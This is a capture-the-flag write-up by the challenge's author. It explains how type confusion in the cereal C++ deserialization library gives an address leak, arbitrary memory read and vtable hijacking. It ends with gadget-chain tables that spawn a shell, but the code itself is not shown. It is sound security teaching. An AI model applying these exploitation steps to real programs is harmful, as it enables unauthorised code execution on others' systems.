Sharing is Caring: Arbitrary Code Execution for Breakfast
Turning happy little accidents into CTF challenges has never been more rewarding.
Deserialization attacks have grown in popularity over the past decade, with major code execution flaws hitting giants such as Microsoft Sharepoint— even in 2025. But what if we could perform deserialization attacks in C++?
Recently, I designed a CTF pwn challenge demonstrating deserialization attacks on a C++ program written with the cereal library.
In this post, we'll revisit C++ internals and explore binary exploitation techniques beyond ROP. We’ll learn how even a properly written C++ program could be vulnerable to remote code execution thanks to insecure deserialization.
The Challenge
The CTF has ended, but the binaries are public! If you want to try solving it or want to follow along, you can grab the challenge distribution pack here!
- Name: Breakfast
- Solves: 11
- Difficulty: Medium?
- Description:
They say breakfast is the most important meal of the day. But sometimes you just need milk to avoid Confusing your favourite Type of cereal...
The code is short, but don't let that fool you. A lot of serialization stuff is abstracted by the cereal library.
The code first outputs the serialization of three types: Congee
, Toast
, and Fruit
. Then it enters a loop which deserializes input and prints the deserialized values.
Running it in the terminal:
C++ Internals Redux
To better understand the program and how the exploitation works, let's review some C++!
If you're familiar, you may want to skip ahead.
What are shared pointers?
Shared pointers (std::shared_ptr
) are smart pointers in C++ that enable multiple pointers to manage the lifetime of a single object. They use reference counting to track how many shared_ptr
objects point to the same dynamically allocated resource. The object is automatically deleted when the last remaining shared_ptr
pointing to it is destroyed or reset. This provides automatic memory management while allowing shared ownership.
Key Point for Exploitation: Multiple shared pointers may share a single object, which requires complex (de)serialization procedures to encode and decode.
Example:
Output:
What are virtual tables?
A vtable (virtual table) is the mechanism that enables runtime polymorphism in C++.
- Each virtual class (any class containing virtual functions) has one corresponding virtual table (vtable).
- The vtable stores an array of virtual functions.
- Each object of a virtual class holds a virtual pointer (vpointer) which points to the vtable they are instantiated with. The vpointer is a "hidden first member" and precedes other members.
- When a virtual function is called, dynamic dispatch is carried out by looking up the vtable then jumping to a function at a hard-coded offset. In assembly, this could be seen as a double dereference.
For further reading, I recommend checking out: Understanding Virtual Tables in C++ by Pablo Arias and this StackOverflow Q&A.
Key Points for Exploitation: 1) If an attacker controls the vpointer, they can hijack control flow. 2) The vpointer is the first member of any object of a virtual class.
std::string
?
What is an We all know what a string
is in programming, but what does C++'s std::string
look like?
If we dig into the source code (which you can find in pretty much any distribution by following the definition of std::string
), we see the implementation is roughly equivalent to:
Ignoring short-string optimisation and other factors, an std::string
simply consists of three members: the buffer (a pointer to the actual characters), the size, and the capacity of the dynamically allocated memory.
This allows for a growable string, suitable for dynamic operations such as append, replace, and remove.
Key Point for Exploitation: If we control buffer
, we can achieve arbitrary memory read.
Analysis
Initial Analysis
First step: Understanding what we have, aka enumeration. What protections are in place? What attack primitives are available?
Protections are typically easy to check. Running checksec
, we see NX/PIE are enabled. This means shellcode is out of the question. By default, ASLR is also enabled, so we'll want some kind of address leak to do anything useful.
Looking at the code, we see 3 classes deserialized.
Cereal supports serialization of std::shared_ptr
. But how are shared references handled?
Cereal's JSON format uses an id
key for shared pointers. If id
is greater than 2 << 30
(2147483648), then the object is new and memory should be allocated for it. Otherwise, the object was seen before and the old std::shared_ptr
should be copied.
For instance, here's a sample JSON cereal-isation containing shared references:
In the above code example, 2147483649 and 2147483650 refer to new objects with ID 1 and 2. Memory is dynamically allocated and object data is deserialized. Afterwards, the deserializer encounters "id": 1
which refers to the first object. No new data is deserialized, and the first std::shared_ptr
is copied.
We've figured out how Cereal handles shared references, but how can we apply it to the challenge?
Well, what if force a shared reference, even if the deserialized types are different?
Type Confusion Primitives
It turns out Cereal does not perform type checking. So if the deserialization handles multiple types, we can abuse it for type confusion!
I'll share a deep-dive into the type confusion primitives in a future post. For now, it suffices to understand what primitives are available in this challenge and how to achieve those primitives.
Here are the types again, for reference:
If we deserialize a... | followed by a... | we get... | because we... |
---|---|---|---|
Toast | Fruit | Address Leak (ASLR Bypass) | leak the vtable |
Congee | Fruit | Arbitrary Memory Read | control string internals |
Congee | Toast | Control Flow Hijacking | control the vpointer |
For instance:
- We have control over one type, say
Toast
. - We trick Cereal into thinking the second type (
Fruit
) is aToast
. This way, we force aFruit
andToast
to share the same memory. - When
Fruit
is used, C++ gets confuses. When it tries to printFruit::name
, what actually gets printed is*Toast::vptr
(vtable entry ofToast
). Calamity!
Together, these primitives are enough to obtain arbitrary code execution!
Exploitation
Great, we've found the chink in the armor. Now let's draft a plan of attack.
- Leak the VTable address. (
Toast
→Fruit
) This allows us to bypass ASLR/PIE as we now know the base address of the binary and can calculate offsets to other locations. - Leak a libc/libcpp address. (
Congee
→Fruit
) This allows us to calculate offsets to gadgets. - Find a heap address. (
Congee
→Fruit
) We'll need this address for the next step. - Craft a gadget chain and hijack control flow to point to said chain. (
Congee
→Toast
) We'll use the 64 bytes available inCongee
to plant a fake vtable containing a gadget chain. When the virtual function is called, the chain is triggered. (I provided 8 quads of room, but I managed to golf it to only 4 quads.)
Leaking the VTable
Leaking the vtable is rather straightforward. We simply set the id
of our Fruit
object such that it refers to the Toast
object. But wait— since Fruit
is a string, we should make sure the size is non-zero. Luckily, we can control the size using Toast
's spread
parameter.
To recap, by type-confusing Fruit
and controlling spread
, we map Toast
's vpointer to Fruit
's string buffer and Toast
's spread
parameter to Fruit
's string size.
When deserialized, t
and f
share the same object. When *f
is printed, it will print the first entry of the vtable, which is Toast::eat
. This is because printing a string will dereference the string buffer and it so happens that the current string buffer is the vtable.
We can do a quick PoC with xxd
. By changing the initial JSON's value1.ptr_wrapper.data.spread
and value2.ptr_wrapper.id
objects, we can induce the binary to spit out 8 weird bytes, which happen to be an address leak of 0x560864bd50c2
! (Hint: It's in little endian, so read the leaked number backwards.)
(Note: If an image ever looks too small, try clicking and zooming in on it.)
Arbitrary Memory Read!
Now that we have an address from the binary, we can continue on our warpath by leaking a libc address. To do so, we’ll use the Congee
→ Fruit
primitive which allows control over the properties of an std::string
and grants us an arbitrary memory read!
We'll use the GOT entry of malloc
as the string buffer. GOT entries are a known relative offset in the binary, so we can calculate it from our earlier vtable leak. When the string is printed, the GOT entry will be dereferenced and we get the address of malloc
.
Finding the Heap Address
Why do we need a heap address?
During type confusion, we will be controlling a malicious vpointer (not the vtable!). To actually get control flow hijacking, we want the vpointer to point to a vtable, which can either be found in program memory as a gadget or maliciously crafted and placed within the remaining 7 quadwords of Congee
. It’s easier to conceive of the latter; thus we need a heap address to the chunk where Congee
will be allocated.
To get a simple heap address leak, we can disclose the memory of any heap address. There are several approaches.
One way is to obtain the main arena, which can be found from libc offset
+0x203ac0
. This then necessitates a convoluted hunt for heap addresses through a sea of indirection.Alternatively, a simpler method I observed from submissions is to take advantage of a
cereal::base64::chars
string declared globally in the binary.By reading from this memory, we can leak the string buffer of
cereal::base64::chars
.
For the sake of simplicity, we'll stick with the cereal::base64::chars
method.
Finding Congee's Address
By observation, Congee
’s address remains unchanged between iterations. This means if we know the address of Congee this iteration, we can reuse that address next iteration.
Fortunately, this offset from the heap's base address is constant and we can calculate it to be +0x131c0
... at least locally.
Finding Congee's Address: Less Hacky Method
Perhaps that seems too hacky or inelegant to some. What if the offset was random? That would likely be the case in a more complex C++ program, one with heaps of memory allocation and deallocation. In that case, I offer an alternative approach.
We can use the bytes in Congee
to store a canary/needle— some kind of fixed string or pattern. Using our leaked heap address as a reference, we'll perform a giant memory read (e.g. 0x1000
bytes) and look for the needle.
In the following code, we'll look for the fixed pattern ABCD
(0x41424344
) preceded by other bytes in Congee.
After a quick test run, we confirmed this seems to work.
Arbitrary Code Execution (ACE) via Gadget Chains
We finally have enough information to get code execution! To do so, we could construct a gadget chain in Congee
and trigger the chain by controlling the vpointer in Toast
.
1) When toast->eat()
is called, the vtable is looked up. Due to type confusion, it actually uses a vpointer we control. 2) We control the vpointer to point to a vtable within the same Congee
payload. The vtable contains a gadget which is called.
Essentially, by controlling the vpointer and vtable, we control the virtual function being called. But how do we craft a malicious function? The answer lies in gadgets.
PCOP / JOP
Classic ROP gadgets end in ret
. Upon hitting the ret
, the Instruction Pointer is set to the next item on the stack. Hence, gadgets could be chained by writing a block of memory to the stack.
PCOP/JOP is similar, but end in different instructions.
- PCOP (Pure Call Oriented Programming): ends in
call SOMETHING
which directly jumps to the next gadget - JOP (Jump Oriented Programming): ends in a
jmp
/call
which jumps to a dispatcher, before jumping into a table of gadgets. The dispatcher's job is to increment a "gadget pointer" before jumping to the next gadget. 1
The advantage of PCOP/JOP is that they don't rely on the stack, but rather on the state of the registers. Instead of stack-based instructions such as pop
and ret
, we prefer instructions such as mov
and call
.
- ROP Gadget:
pop rax; ret
. - PCOP/JOP Gadget:
mov rax, [rdi+8]; call [rax+0x10]
Approach 1: libstdc++ & One-Gadget
Funnily enough, this was the first working solution I came up with— and it's also the shortest payload I've seen so far as it fits within 4 quads.
A One-Gadget is a gadget which pops a shell if certain conditions are met. By running one_gadget
, we can find several gadgets which potentially spawn /bin/sh
.
From here, we could choose any one-gadget for ACE. But to meet the conditions, we should understand the state of the registers at the moment the virtual function is called. This calls for some breakpoints!
Disassembly and registers upon reaching Toast::eat()
, reachable via b *main+1121; si
.
By navigating to Toast::eat()
, we notice the following interesting register states:
rax == rdi
: non-controllable, address of virtual object (&*t
)rdx
: controllable, first address to jump torsi == r13 == 0
Our attention then turns to fulfilling the one-gadget constraints. I chose the third (offset 0xef4ce
) for its relatively simple conditions: we just need rbx = r12 = 0
. We can hunt for gadgets with tools such as ROPgadget
or xgadget
and filter for gadgets which allow control over our desired registers.
Importantly, we should ensure the final call
instruction of a gadget jumps to a desirable offset within Congee
, e.g. call [rax+0x10]
. We should also exclude gadgets relying on the stack. This means any gadget containing pop
, leave
, and ret
.2
Output of
xgadget --reg-overwrite r12 --jop /usr/lib/x86_64-linux-gnu/libstdc++.so.6
. We found a useful mov r12, rsi
gadget which sets r12
to 0. Additionally, the gadget will go to [rax+0x10]
meaning we can place another gadget at the +0x10
offset to continue the chain.
After a while, we ended up with two simple gadgets from libstdc++
. Constructing the final payload is simply a matter of cooking congee with the right ingredients:
Congee Ingredients:
Offset | Value | Purpose |
---|---|---|
0x00 | address of Congee + 0x08 | vpointer, points to offset 0x08 |
0x08 | libstdcpp + 0xf0a0c | first gadget, set r12 to 0 (r12 = rsi ) |
0x10 | libstdcpp + 0xf5e83 | second gadget, set rbx to 0 (rbx = rsi ) |
0x18 | libc + 0xef4ce | one-gadget, sweet sweet code execution! |
The gadget flow is extremely straightforward:
- VTable is at Congee address +
0x08
→ - gadget at
0x08
(setr12
to 0) → - gadget at
0x10
(setrbx
to 0) → - gadget at
0x18
(one-gadget ACE).
Putting it all together, we get ACE.
system("/bin/sh")
Gadget Chain
Approach 2: Credit: Adapted from @erge’s and @lolc4t’s solutions.
I'm sure this gadget chain feels closer to home for ROPpers. The chain works by setting rdi
to "/bin/sh"
and calling the system
function. Despite the need for 6 quads in Congee, I find the chain rather fascinating as it condenses multiple steps into 2 key gadgets.
Another nice aspect about this chain is that it does not rely on too much register state, only on rax
and rdi
. (The libstdc++ and one-gadget chain relies on rsi = 0
which may not always be the case.)
Congee Ingredients:
Offset | Value | Purpose |
---|---|---|
0x00 | address of Congee + 0x10 | vpointer |
0x08 | address of Congee + 0x18 | address of [system, binsh, gadget2] structure |
0x10 | libc + 0x1740b1 | first gadget, mov rax, [rdi+8]; call [rax+0x10] |
0x18 | system | sweet sweet code execution! |
0x20 | &"/bin/sh" | address of any /bin/sh string |
0x28 | libc + 0xa5688 | second gadget, mov rdi, [rax+8]; call [rax] |
The call flow is:
- VTable is at Congee address +
0x10
→ - gadget at
0x10
(setrax
to*(rdi+0x08)
, which is the second Congee entry, or in other words: Congee address +0x18
) → - gadget at
0x28
(setrdi
to"/bin/sh"
) → 4. gadget at0x18
(system
ACE).
To make the this gadget chain work, we require the system, binsh, and 0xa5688
gadget to be contiguous in memory. This is because after the mov rax
in the first step, the subsequent assembly will call rax+0x10
, which triggers the second gadget to copy rax+0x08
to rdi
and then call rax
.
The order of the other gadgets don’t matter as much. Here’s one of the solves from the CTF community. Notice how the first gadget is placed at the end of the Congee payload.
Alternative implementation by @lolc4t.
Conclusion
This was an interest challenge to make as it helped refresh my binary exploitation skills despite me sucking at pwn challenges. I was also happy that players came up with different solutions, challenging my biases on the concept of a successful gadget chain.
Overall, this has been a great experience (and hopefully the same goes for others). I have a few variant challenges I might present in future CTFs. We'll see if they make it out.
Special thanks to thehackerscrew CTF team for hosting my CTF challenge and to the players who opened my mind by sharing their solves.
Solve Script
Flag
Footnotes
For further reading on JOP, I recommend reading this StackExchange answer: Security.SE: Concept of Jump-Oriented-Programming (JOP). It provides an excellent summary and brief history on ROP/JOP. ↩︎
We exclude stack-based gadgets to simplify the exploit, even if an attack with such gadgets may be possible. The reason for doing so is that we don’t have direct control over stack memory. We would need the help of gadgets to push/modify the stack. Even then, modifying the stack without fine-grained control potentially crashes the program. So we explore other alternatives first. ↩︎
Comments are back! Privacy-focused; without ads, bloatware 🤮, and trackers. Be one of the first to contribute to the discussion— before AI invades social media, Trump declares war on guppies, and what little humanity left is lost to time.